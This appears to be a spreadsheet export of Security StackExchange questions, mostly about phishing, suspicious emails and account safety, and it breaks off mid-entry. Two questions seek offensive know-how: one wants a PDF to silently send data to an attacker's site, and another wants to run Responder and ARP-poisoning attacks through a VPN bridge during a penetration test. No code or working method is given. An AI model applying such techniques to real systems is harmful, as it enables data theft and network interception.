 &lt;p&gt;I was on a Mac that runs Yosemite version 10.10.5 and I haven't updated Google Chrome for like one or two years. Firewall was on. I use Google Chrome to do all the money related activities. &lt;/p&gt;
 &lt;p&gt;After that, I deleted cookies and cache from Google Chrome and accessed my Amazon account through the real Amazon login page. It didn't seem anything has happened on my account yet.&lt;/p&gt;
 &lt;p&gt;I don't have any anti-virus software running on that Mac.&lt;/p&gt;
 &lt;p&gt;Is there any chance that my Mac is now in danger because of this? Should I do things like changing my Amazon password or re-installing the OS? &lt;/p&gt;</t>
  </si>
  <si>
    <t>Send GET request from a PDF file</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm currently working on a security Proof Of Concept where I need to show the danger of opening an unknown PDF file.
 Internet says that many malwares use Javascript in PDF document (AcroJS) to download their malicious payload.&lt;/p&gt;
 &lt;p&gt;My PoC is based on a victim who will demonstrate data leak based on opening a PDF file. I only needs to send the filename over Internet (to begin).&lt;br&gt;
 I can write Javascript code which launch at document opening but the Net.HTTP.request function can only be used in trusted context.&lt;br&gt;
 So I don't see how to make a GET request to my listening "evil" website.
 I read that sometimes hackers use vulnerabilities in Acrobat to do their bad, but many places talk about the native ability of AcroJS to permit GET request.&lt;/p&gt;
 &lt;p&gt;Is anyone knowing how to do a one way GET request (the answer of the server is not even interesting in this case).&lt;/p&gt;
 &lt;p&gt;Maybe is there a way to include a remote (non existent) picture so the PDF will make a GET request to the specified URL.
 Or something like this.&lt;/p&gt;
 &lt;p&gt;Thanks&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;malware&gt;&lt;javascript&gt;&lt;phishing&gt;&lt;pdf&gt;</t>
  </si>
  <si>
    <t>Capture emails of users who clicked my link</t>
  </si>
  <si>
    <t>&lt;p&gt;a follow up question to this: &lt;a href="https://security.stackexchange.com/questions/187085/tracking-click-through-for-organization-wide-phishing-email-test?noredirect=1#comment367544_187085"&gt;Tracking click-through for organization-wide phishing email test&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;I am going to send an email (fake phish) to all my org. users via email.
 I want to test the users so if they click a malicious(fake) link their email address will be sent to a list (or I receive a notification saying user X click your test link) domain name will get logged/added to a list somewhere I can grab.&lt;/p&gt;
 &lt;p&gt;Method to capture the email address of users who clicked my link in a email.&lt;/p&gt;</t>
  </si>
  <si>
    <t>Can client-side hashing reduce the denial-of-service risk with slow hashes?</t>
  </si>
  <si>
    <t>&lt;p&gt;When storing user's passwords that you need to verify against (but not use as plaintext) the current state of the art is:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;Hash the password&lt;/li&gt;
 &lt;li&gt;Use a salt&lt;/li&gt;
 &lt;li&gt;Use a slow hash function - bcrypt, scrypt, etc.&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;This provides the best possible protection against an attacker who has stolen the password database. It does not solve other issues like phishing, malware, password re-use, etc.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;But&lt;/strong&gt; there is one remaining problem: the slow hash function can allow a &lt;strong&gt;denial of service&lt;/strong&gt; attack. A single request burns a lot of CPU, which makes a DOS possible with a relatively small number of concurrent requests, making it difficult to use defences like IP throttling.&lt;/p&gt;
 &lt;p&gt;Given the improving performance of JavaScript in browsers, it may now make sense to do this in the browser. I'm assuming here that the site is using SSL, so the JavaScript is delivered securely. If you're not using SSL, then using a slow hash function is unlikely to be a priority for you. There is at least one &lt;a href="https://code.google.com/p/javascript-bcrypt/"&gt;JavaScript implementation&lt;/a&gt; of bcrypt. But using this in a simple way would introduce two problems:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;The client needs to fetch the salt from the server. This introduces latency on login and, unless care is taken, can reveal whether a particular user account exists.&lt;/li&gt;
 &lt;li&gt;If hashing is done purely on the client then the benefits of storing hashes are lost. At attacker who has stolen the password hashes can simply login using the hashes.&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;However, I think there are acceptable solutions to both of those problems:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;The salt can be generated as hash(server_salt + user_name) - where server_salt is a random number that is unique to the server, public, and the same for all users. The resulting hash appears to have the required properties of a salt.&lt;/li&gt;
 &lt;li&gt;The server should do a single, fast, hash operation on the hash it receives. As an example: the server stores SHA-256(bcrypt(salt, password)). The client sends bcrypt(salt, password) then the server applies SHA-256 and checks the hash. This does NOT allow an attacker to conduct a fast offline brute force attack. They can do a fast brute force of SHA-256(password) because password has a limited amount of entropy - 2^50 or 2^60 or so. But a 128-bit bcrypt(salt, password) has entropy or 2^128, so they cannot readily brute force it.&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;So, is this a reasonable and secure approach?&lt;/p&gt;
 &lt;p&gt;I am aware of the general advice to "don't roll your own crypto". However, in this case, I am attempting to solve a problem that is not solved by off-the-shelf crypto. For some basic credibility, this has been looked at by &lt;a href="http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2014-February/008985.html"&gt;John Steven&lt;/a&gt; (a recognised expert in the field) with positive outcome from a "brief" analysis.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;passwords&gt;&lt;hash&gt;&lt;bcrypt&gt;</t>
  </si>
  <si>
    <t>Block Outbound Connections by Country</t>
  </si>
  <si>
    <t>&lt;p&gt;We want to reduce the number of phishing sites that our users can get to. Would it be useful or more problematic to block outbound connections by geo IP? We already block many inbound connections by country. I know it won't block all phishing sites.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;firewalls&gt;&lt;phishing&gt;&lt;geolocation&gt;</t>
  </si>
  <si>
    <t>Unknown automatically generated email in sent folder</t>
  </si>
  <si>
    <t>&lt;p&gt;I just noticed a strange email in my sent folder that I did not send. Here is the header information:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;To: 5f3d36eb61801dda4063@cloudmailin.net
 From: ********@gmail.com
 Date: Mon, 10 Jun 2019 06:54:17 -0700
 Message-ID: &amp;lt;CAHMUou-d6rW138ucKhKVoLWqzn2ZZ12Q0-wK+FR6SCXDr89YmQ@mail.gmail.com&amp;gt;
 Subject: bW9KRGdIeTlyMFd2UjZQQVYrQUd0TVJ5N2IrbDlqVXh2NlF6ZUFvaDlaanpRQWwzVmZtVFlwQVo5cXUybmRFbC0ta0VvVDdmakJzVzQzL3lQM2lYL0tBQT09--19cd1b1aa0f32659eece53630df822281b44c804
 MIME-Version: 1.0
 Content-Type: text/plain; charset=UTF-8
 Content-Transfer-Encoding: 7bit
 Content-Disposition: inline
 This message was automatically generated by Gmail.
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;There was no content in the email, just the jumble of characters in the subject. The email address this was sent to is reported a few times on the internet as possible phishing, but it's not clear to me why Gmail would automatically generate an email on my behalf to this address. The "From" field was indeed my actual email address.&lt;/p&gt;
 &lt;p&gt;I have already changed my password as a precaution, but I am curious is this anything to worry further about?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;gmail&gt;</t>
  </si>
  <si>
    <t>How could the content of an e-mail get leaked?</t>
  </si>
  <si>
    <t>&lt;p&gt;My Mother received an e-mail, from some unknown mail adress. The content of the mail, was:
 &lt;em&gt;&amp;quot;Hello you should look at this: ... &amp;quot;&lt;/em&gt; After this there was an old email correspondence with her lawyer, not really sensitive data, but still. There was a .zip file attached, the file name beeing some long number. She didn't try to open it or anything.&lt;/p&gt;
 &lt;p&gt;She is confident with computers, so she would not click on suspicious links in mails and not enter her passwords somewhere easily (of course you can always fall for something, but i don't belief she did). She also uses a password manager with good passwords for every account.&lt;/p&gt;
 &lt;p&gt;How could the content of the mails have been leaked? And what are steps to take now?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;phishing&gt;&lt;data-leakage&gt;&lt;email-spoofing&gt;</t>
  </si>
  <si>
    <t>How can I prevent a "rogue" front end?</t>
  </si>
  <si>
    <t>&lt;p&gt;I developed my product, which is exposed via API+web+mobile app.&lt;/p&gt;
 &lt;p&gt;How can I prevent a 3rd party from developing its own front end and plug it on my backend?&lt;/p&gt;
 &lt;p&gt;I'm not talking about a simple phishing attack but a &amp;quot;chaotic-good&amp;quot; guy, that thinks my frontend sucks and wishes to provide my service on his terms and get away with my ads revenue, got it?&lt;/p&gt;
 &lt;p&gt;Details:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;The Api is exposed by Azure API Management service.&lt;/li&gt;
 &lt;li&gt;Backend is .Net 5&lt;/li&gt;
 &lt;/ol&gt;</t>
  </si>
  <si>
    <t>&lt;api&gt;</t>
  </si>
  <si>
    <t>Company does not want any names on phishing reports</t>
  </si>
  <si>
    <t>&lt;p&gt;We have been recently contracted to run phishing tests for a company. Let's call it a company but basically they are obligated, by law, to assess the security of their environment with phishing campaigns.&lt;/p&gt;
 &lt;p&gt;We ran our first campaigns not too long ago and the results were pretty bad. Over 70% of their users trusted the "malicious emails" we sent and did whatever the email asked of them.&lt;/p&gt;
 &lt;p&gt;After it was over, we of course had a out brief detailing our findings. Long story short, they did not want ~any~ Identifiers (email, username, whatever) of who fell for the phish. They wanted "X out of 300" failed to identify the email. Their reason was they did not want to offend anyone. (I wanted to say your customers feelings will be hurt when your employees fall for a potential attack and leak info) I politely accused them of checking a box and not actually being interested in educating their users. They weren't very happy. I should elaborate by saying they didn't even want 2 reports, one showing the emails and another not showing them. I offered it to them because at least they can see how these individual people react to different campaigns overtime. This would absolutely help if user "Sam" clicks on every single link in a email every time over the course of ten campaigns. Surely you would want to educate Sam differently than other users?&lt;/p&gt;
 &lt;p&gt;My question is, does this not defeat the purpose of phishing campaigns and improving the security of information in your network? Is this even normal?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;account-security&gt;</t>
  </si>
  <si>
    <t>Phishing emails and securing set up from compromise?</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm a one-man company and I'm getting a lot of phishing emails very similar to the emails from companies I use.&lt;/p&gt;
 &lt;p&gt;Some of these companies and the emails we exchange are very unique. How would these malicious senders 'learn' the type of emails and content I send?&lt;/p&gt;
 &lt;p&gt;Since the increase in phishing emails I've also noticed I'm receiving very few genuine emails from the businesses I used to deal with and as such business has slowed down.&lt;/p&gt;
 &lt;p&gt;My website is on a shared hosting. I use Webmail using Roundcube to usually send receive emails. I've also set up an Imap email account to my webmail account on my android phone (samsung) - is there any security I need to implement on that? The Imap security type setting for both incoming and outgoing server is set to SSL (accept all certificates) over port 465?&lt;/p&gt;
 &lt;p&gt;Could they be sniffing out content? If so, what are the recommended steps to prevent and to secure a compromised website/email?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;spam&gt;&lt;breach&gt;</t>
  </si>
  <si>
    <t>Finding your 'pornstar name' by combining, e.g. your first pet's name and your mother's maiden name. Was this originally a form of phishing?</t>
  </si>
  <si>
    <t>&lt;p&gt;It worked like this -- you were at a party and each person said their first pet's name, e.g. 'Binky' and their mother's maiden name 'Robinson' and the (supposedly hilarious) result was the 'pornstar' name Binkie Robinson. Making the animal and the person specific always seemed pretty pointless to me as far as the game was concerned because most pet names combined with a surname will give this humorous effect.&lt;/p&gt;
 &lt;p&gt;Therefore, right from the start I wondered if this was simply a phishing attempt because of course people often use those things as passwords or recovery information.&lt;/p&gt;
 &lt;p&gt;My bank asks account holders to provide a security password for identification when phoning them. By default they ask for 'your mother's maiden name'. Some well-known websites have a 'secret' password-recovery question that is 'What was the name of your first pet.'&lt;/p&gt;
 &lt;p&gt;Quite recently I have heard people playing this game on buses and even TV shows so it's still around.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Questions&lt;/strong&gt;&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;&lt;p&gt;Is there any evidence or even suspicion that this originated as a phishing scam? Have I been paranoid about it all this time for nothing?&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;There are websites that present this as a game -- are they likely to be phishing?&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;If a website gathers this information does it pose a serious risk to anyone's data security?&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;I phoned into a radio station once because the DJ was playing this game every week with his celebrity guests. I tried to point out the risk but they didn't even understand the concept of what I was talking about. They obviously thought I was a crank and afterwards I started to doubt myself! Who is nuts? Me or them? &lt;/p&gt;&lt;/li&gt;
 &lt;/ol&gt;</t>
  </si>
  <si>
    <t>Is it possible to run Responder and/or Layer 2 ARP Poisoning over OpenVPN or an OpenVPN Ethernet Bridge?</t>
  </si>
  <si>
    <t>&lt;p&gt;Situation: We usually perform penetration tests from Linux machines connected to the clients local network. However for this test the client wants the start point to be a windows machine and has thus provided us with remote access to one of their windows workstations(To simulate phishing). &lt;/p&gt;
 &lt;p&gt;I know there are windows alternative options, but what i'm wanting to do is find the best way to "fully" join my linux machine in our office to the network that the windows machine is on. &lt;/p&gt;
 &lt;p&gt;My current thinking is a OpenVPN connection via a reverse SSH tunnel. Will this be enough to run tools such as Responder and Layer 2 MITM attacks? I'm open to any alternative methods of joining the linux machine to the remote network. &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;network&gt;&lt;penetration-test&gt;&lt;vpn&gt;&lt;openvpn&gt;</t>
  </si>
  <si>
    <t>How to confirm that a ‚ÄòGoogle Play Services‚Äô app isn‚Äôt a phishing attempt?</t>
  </si>
  <si>
    <t>&lt;p&gt;A user of mine was recently prompted by an app purporting to be from Google to re-enter their password on their personal phone.This prompt was derived in the form of an un-dismissible notification.&lt;/p&gt;
 &lt;p&gt;Upon clicking the notification, a message saying that &lt;em&gt;‚ÄúThere‚Äôs been a change to your Google Account. For your security, sign in again.‚Äù&lt;/em&gt;&lt;/p&gt;
 &lt;p&gt;Other than the fact that this does look and feel like a legitimate request a number of indicators made the user (and myself) suspicious.&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;None of the Google services, Gmail, Google maps etc. had been signed
 out, despite the wording of the message asking the user to sign in
 &lt;em&gt;again&lt;/em&gt;.&lt;/li&gt;
 &lt;li&gt;Two factor authentication is enabled, although the Android devices
 that is displaying the notification is used to receive the second
 factor. The second factor once received is automatically used by
 the app without the user needing to take any action.&lt;/li&gt;
 &lt;li&gt;Upon checking active connections a HTTP connection on TCP/443 and VNC
 connection on TCP/5228 had been established. The VNC connection is
 unexplained, and could be false positive down to the way the SockStat
 app guesses services on the port&lt;/li&gt;
 &lt;li&gt;Looking at recent logins, this login is not listed.&lt;/li&gt;
 &lt;li&gt;The installation of 3rd party app has been enabled in the past as the user is IT based and has installed 3rd party utilities. (Although not in recent memory, and they have since been removed)&lt;/li&gt;
 &lt;li&gt;The phone has no Anti Virus installed&lt;/li&gt;
 &lt;li&gt;The user browses the internet with &lt;em&gt;"reckless abandon"&lt;/em&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;What practical steps can be taken on the phone by a user to confirm that this app is legitimate and not a phishing attempt before entering their password?&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/6VB8g.jpg" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/6VB8g.jpg" alt="enter image description here"&gt;&lt;/a&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;android&gt;&lt;phishing&gt;&lt;google-apps&gt;</t>
  </si>
  <si>
    <t>Does Convergence solve the problem of hacked CAs?</t>
  </si>
  <si>
    <t>&lt;p&gt;My question is about the Firefox AddOn &lt;strong&gt;&lt;a href="http://en.wikipedia.org/wiki/Convergence_(SSL)" rel="nofollow"&gt;Convergence&lt;/a&gt;&lt;/strong&gt;.&lt;/p&gt;
 &lt;p&gt;So my question is if it is possible for convergence to observe that a phishing-site which is verified by fake Certificate because a hacker of a CA created one, is useing a actual not valid certificate?&lt;/p&gt;
 &lt;p&gt;I understand that with convergence the problem for the man-in-the-middle attack is solved.
 But it doesn't solve the problem with the hacked CAs, right?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;tls&gt;&lt;authentication&gt;&lt;public-key-infrastructure&gt;&lt;certificate-authority&gt;</t>
  </si>
  <si>
    <t>BeEF - What are the Indicators of Compromise (IOC)</t>
  </si>
  <si>
    <t>&lt;p&gt;If a phishing email came through with a link to a website hosting BeEF (or another such framework) what would be the Indicators of Compromise for such an attack.&lt;/p&gt;
 &lt;p&gt;Additionally, if systems were compromised what would be the best strategy to mitigate it.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;browser-hijacking&gt;&lt;beef&gt;</t>
  </si>
  <si>
    <t>Effectiveness of Security Images</t>
  </si>
  <si>
    <t>&lt;p&gt;Do security images such as those presented upon logging into banks provide any tangible security benefits, or are they mostly theater?&lt;/p&gt;
 &lt;p&gt;Per my understanding, if somebody is phishing your users, it's also trivial for them to proxy requests from your users to your authentic website and retrieve the security image with whatever credentials the user provides before receiving the image (e.g., the username). If this is the case, security images seem to provide no additional security, and may actually be harmful if they help convince users that a malicious website is legitimate.&lt;/p&gt;
 &lt;p&gt;Am I missing something?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;authentication&gt;&lt;phishing&gt;&lt;security-theater&gt;&lt;sitekey&gt;&lt;security-seal&gt;</t>
  </si>
  <si>
    <t>Is it risky to buy refurbished phones?</t>
  </si>
  <si>
    <t>&lt;p&gt;At least in theory, when buying a refurbished phone, is there a chance the phone has been modified, in the same vein as phishing, to look like a stock installation, down to the "factory reset" and maybe even appear rooted?&lt;/p&gt;
 &lt;p&gt;I.e., if a company bought 300 refurbished phones off eBay...&lt;/p&gt;
 &lt;p&gt;I suppose running Wireshark to see what's coming in or out might be a good start but I am hoping someone will say it's extremely unlikely (given that nothing's impossible).&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;malware&gt;&lt;phone&gt;&lt;rootkits&gt;</t>
  </si>
  <si>
    <t>In What Ways Can X-Foward-For Header Information Be Used In An Attack</t>
  </si>
  <si>
    <t>&lt;p&gt;By enabling X-Foward-For on our proxy, we would essentially be advertising our internal IP addresses externally. However, we use a private range. Everything goes through NAT. So, the best anyone would see is something similar to, 192.168.x.x.&lt;/p&gt;
 &lt;p&gt;We came up with a scenario where an attacker could use the information in a phishing attack. If they could lure a user into clicking a link, then they would know the user's IP address and may be more able to impersonate someone from IT in a phishing call.&lt;/p&gt;
 &lt;p&gt;I'm interested in learning other scenarios where having X-Foward-For enabled on the proxy could have a negative effect. We would NOT be using this for authentication in any scenario. How could this information be used in an attack?&lt;/p&gt;
 &lt;p&gt;Thanks,&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;web-browser&gt;&lt;webserver&gt;&lt;http&gt;&lt;proxy&gt;</t>
  </si>
  <si>
    <t>Strong file encryption for sensitive data</t>
  </si>
  <si>
    <t>&lt;h3&gt;My first question:&lt;/h3&gt;
 &lt;p&gt;Our new app will work with files that contains sensitive data (e.g. finances). These files will be stored on the client first than synchronized to our server. &lt;br&gt;&lt;b&gt;I need a method for ...&lt;/b&gt;&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;prevent phishing malwares may be exist on client PC to gather these infos&lt;/li&gt;
 &lt;li&gt;making user data untraceable - preventing anybody to know what data belong to what person.&lt;/li&gt;
 &lt;/ul&gt;
 &lt;blockquote&gt;
  &lt;p&gt;&lt;strong&gt;So, what are the well-established methods to do this?&lt;/strong&gt;&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;h3&gt;My second question:&lt;/h3&gt;
 &lt;p&gt;I heard about some &lt;em&gt;crypto algorithms&lt;/em&gt; like AES but I don't know if it's enough to use this (I mean AES256 at least).&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;&lt;strong&gt;Is AES good for encrypting files or could you suggest me better?&lt;/strong&gt;&lt;/p&gt;
 &lt;/blockquote&gt;</t>
  </si>
  <si>
    <t>&lt;encryption&gt;&lt;cryptography&gt;&lt;account-security&gt;</t>
  </si>
  <si>
    <t>How can I trust that this is Google?</t>
  </si>
  <si>
    <t>&lt;p&gt;How do I trust that I am typing my password for Google when I'm using a Safari web view in an any iOS app?&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/07yb0.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/07yb0m.png" alt="&amp;#39;Sign In&amp;#39; page, which appears to come from Google"&gt;&lt;/a&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;authentication&gt;&lt;google&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Phising test failed e-mail to my personal account, how does this scam work?</t>
  </si>
  <si>
    <t>&lt;p&gt;I've recently gotten a pair of "User Selkie has failed the phishing test" emails to my personal account. The email has no other information, no links or anything, and while I'm not going to respond to it or do anything, I'm wondering how this particular scam works, and if there's anything else I should be doing.&lt;/p&gt;
 &lt;p&gt;Adding a few details: This is my personal Gmail account&lt;/p&gt;</t>
  </si>
  <si>
    <t>A "new domain registration" spam?</t>
  </si>
  <si>
    <t>&lt;p&gt;About 6 days ago I purchased a new domain under .org TLD from a local registrar.&lt;/p&gt;
 &lt;p&gt;Few days later, I have received this strange message (which BTW fell to
 Gmail spam bin), which looks like some kind of phishing to me.&lt;/p&gt;
 &lt;p&gt;Following is the e-mail contents (redacted the hashes in "unsubscribe"
 links and my domain for "example.org"):&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;Congratulations on your purchase of example.org
 You MUST have accurate and updated contact information. Providing false or =
 inaccurate contact information=20
 can be grounds for the cancellation of your domain name registration as =
 required by ICANN (More info below)=2E
 You can also protect your brand by registering all related domain =
 extensions (ie: .com,.net,.org...) before someone else does=2E
 Check your your complimentary domain availability report now just click =
 the link below:
 http://www.namelock.org/?domain=3Dexample.org (Click on the link or copy &amp;amp; =
 paste into your browser)
 Key Domain Resources:
 - For Domain Registration FAQ's: =
 http://newregistrationhelp.com/knowledgebase.php
 - For Domain Availability Report: =
 http://www.namelock.org/?domain=3Dexample.org (Click on the link or copy &amp;amp; =
 paste into your browser)
 - For ICann Guidelines: http://www.icann.org/whois/wdrp-registrant-faq.htm
 Sincerely,
 Sophia Newman=20
 Support Team @ NewRegistrationHelp.com
 Please do not reply to this email. This email was sent from a =
 notification-only address=2E
 For customer service inquiries, please visit NewRegistrationHelp.com =
 NewRegistrationHelp.com
 1, Avenue Marronniers
 Saint Ouen, Paris 93400
  All rights reserved - Copyright 2013=2E
 If you prefer not to receive additional emails please unsubscribe now You =
 are receiving this message because you recently made a domain name =
 purchase. We hope you find these communications valuable however, if you =
 would prefer to no longer receive emails from us, please copy and paste =
 the following URL in your browser to unsubscribe: =
 http://smtp235.newregistrationhelp.com/u.aspx?some/aZ09hashes
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Not that it would be the traditional phishing in the sense that it would directly ask for credentials like "you need to reset your password" stuff,
 but there definitely is something funky about it:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;&lt;p&gt;it knows my domain name&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;it came few days after registering&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;it uses phrase "You MUST" in the first paragraph (trying to FUD me?)&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;it's from a completely different entity than any of those I know are
 involved (me, the local registrar, .org manager...?)&lt;/p&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;First explanation that came into my mind is that somebody has a list of
 .org domains (that probably once existed?) and keeps polling DNSes to find
 out when they were registered, then stealing e-mails from whois.&lt;/p&gt;
 &lt;p&gt;So is this some known / common kind of spamming/phishing technique? Should
 I act upon that? Does this "incident" speak against my registrar's credibility?&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Edit&lt;/strong&gt; just to finish the story with full irony:&lt;/p&gt;
 &lt;p&gt;Next to this message, there were two messages from a &lt;em&gt;legitimate&lt;/em&gt; "registrar
 B" which I did not finish registration with that day: A lost activation mail,
 and a humble request for feed-back and offer to help with finishing the registration. Later I have reported and explained this to them.&lt;/p&gt;
 &lt;p&gt;So it came it to my mind that while this kind of crap may not be particularly
 dangerous, it seems to be quite successful in &lt;em&gt;poisoning spam filters&lt;/em&gt;,
 making words like "registration" and "domain" effective V-words.&lt;/p&gt;
 &lt;p&gt;At the end of the day, it's not me being "phiscked", it's the poor other
 "registrar B" being "bayescked".&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;spam&gt;&lt;phishing&gt;&lt;dns-domain&gt;</t>
  </si>
  <si>
    <t>Opened a phising email on school email</t>
  </si>
  <si>
    <t>&lt;p&gt;&lt;img src="https://i.stack.imgur.com/vb9rj.jpg" alt="enter image description here"&gt;&lt;/p&gt;
 &lt;p&gt;Hello I opened this email sent to my school email and I realized it was a phising email. &lt;/p&gt;
 &lt;p&gt;And now my OCD and anxiety are going haywire. Is it possible I got infected? I did not click on any links. I just opened it. &lt;/p&gt;
 &lt;p&gt;I tried to change my password but the school system wont let me and their offices are closed. I opened it on my galaxy 9 . Is the phone infected? Will I be safe in connecting it to the school wifi that is connected to the email ? Should I change all my passwords on the apps on my phone?? &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;android&gt;&lt;virus&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Is there any potential harm in opening up junk emails in Outlook in the browser?</t>
  </si>
  <si>
    <t>&lt;p&gt;I check my emails in Chrome using outlook.com, and occasionally I read through the emails marked as junk, both to see if they are junk, and to laugh at the amusing phishing attempts. &lt;/p&gt;
 &lt;p&gt;Could I be putting my computer at risk by opening up these emails? I never download any attachments or click any links.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;web-browser&gt;&lt;email&gt;</t>
  </si>
  <si>
    <t>May I have into account security concerns when considering to send emails massively (&gt;100,000)?</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm considering sending more than 100,000 emails as fast as possible to different users of my website. These is not spam but requested emails. I'm using my own mail server (Exchange 2010).&lt;/p&gt;
 &lt;p&gt;May I have into account any security concerns?&lt;/p&gt;
 &lt;p&gt;For example, I think that:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;My IPs may be blacklisted by remote mail servers (if for example I
 send too much emails to Gmail receivers...)&lt;/li&gt;
 &lt;li&gt;An attacker may see that I am sending lots of emails and try to phish my customers&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;Any other security concerns?&lt;/p&gt;</t>
  </si>
  <si>
    <t>What are simple things I can do to protect my digital identity?</t>
  </si>
  <si>
    <t>&lt;p&gt;I have taken a big interest in securing my digital info and feel like I have addressed many typical problems. For example:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;I've gone to full disk encryption on my android phone and linux laptop.&lt;/li&gt;
 &lt;li&gt;My phone requires a pattern to boot or unlock, and can be locked or wiped remotely.&lt;/li&gt;
 &lt;li&gt;I've started using a password manager with strong unique passwords for as many accounts as I can remember having.&lt;/li&gt;
 &lt;li&gt;I've studied password generating and cracking and developed some strong passwords to lock down the services I have to type manually and the password manager; and setup reminders to change them periodically.&lt;/li&gt;
 &lt;li&gt;I've enabled 2-factor authentication for as many websites as have it, for example Google and Amazon&lt;/li&gt;
 &lt;li&gt;I've made sure all my devices are up to date and setup to stay that way.&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;What are some similar, simple steps to take to protect one's identity?&lt;/p&gt;
 &lt;p&gt;To keep the scope of this question smaller, I'm looking for a list of technical or behavioral solutions that address common identity theft attacks; I'm not looking for answers broad enough to address phishing, social engineering attacks, physical damage/theft etc. or that are extremely onerous or that protect against extremely unlikely attacks. I'm also not worried about data collection from companies I've chosen to have a relationship with like Google, Amazon, etc; but answers about protection from personally identifiable information collected passively via device fingerprints or the like would be on topic.&lt;/p&gt;
 &lt;p&gt;I'm basically looking for the short list of dumb things not to do that unwittingly make myself vulnerable to financial or reputation damage (but mostly financial). For example, not choosing a password in the format of capitalized word + 2 digit number length &amp;lt;= 8.&lt;/p&gt;
 &lt;p&gt;I know this question is similar to the closed question &lt;a href="https://security.stackexchange.com/questions/111691/what-else-can-i-do-to-protect-my-accounts"&gt;here&lt;/a&gt; but I've tried to confine my question to a very specific scope. &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;privacy&gt;&lt;account-security&gt;</t>
  </si>
  <si>
    <t>Why doesn't Gmail make it clearer that emails have been signed by DKIM and delivered over TLS?</t>
  </si>
  <si>
    <t>&lt;p&gt;If a webpage is delivered over HTTPS, the browser makes this clear with a padlock symbol. It's something that people look for. My browser also makes it clear that a page is &lt;em&gt;not&lt;/em&gt; secure.&lt;/p&gt;
 &lt;p&gt;Why aren't emails treated similarly? In Gmail, you have to open up a small pop-up to see that an email is signed by DKIM and delivered over TLS. Else there's no obvious indication.&lt;/p&gt;
 &lt;p&gt;I ask this because someone asked me to put a link to PayPal in an email but it's a bad idea due to the risk of phishing. Except this would be no more insecure than a website if users were on the look out for a secure symbol, as they are with a website.&lt;/p&gt;</t>
  </si>
  <si>
    <t>What harm is there in obtaining password hashes in a Windows environment?</t>
  </si>
  <si>
    <t>&lt;p&gt;ArsTechnica posted this article recently talking about how the power grid has been penetrated:&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://arstechnica.com/information-technology/2017/09/hackers-lie-in-wait-after-penetrating-us-and-europe-power-grid-networks/" rel="nofollow noreferrer"&gt;Hackers lie in wait after penetrating US and Europe power grid networks&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;Excerpt:&lt;/p&gt;
 &lt;blockquote&gt;
 &lt;p&gt;One tactic involved using the publicly available Phishery toolkit to send targets a Microsoft Word document that was programmed to download a template from a predetermined server controlled by the attackers.&lt;/p&gt;
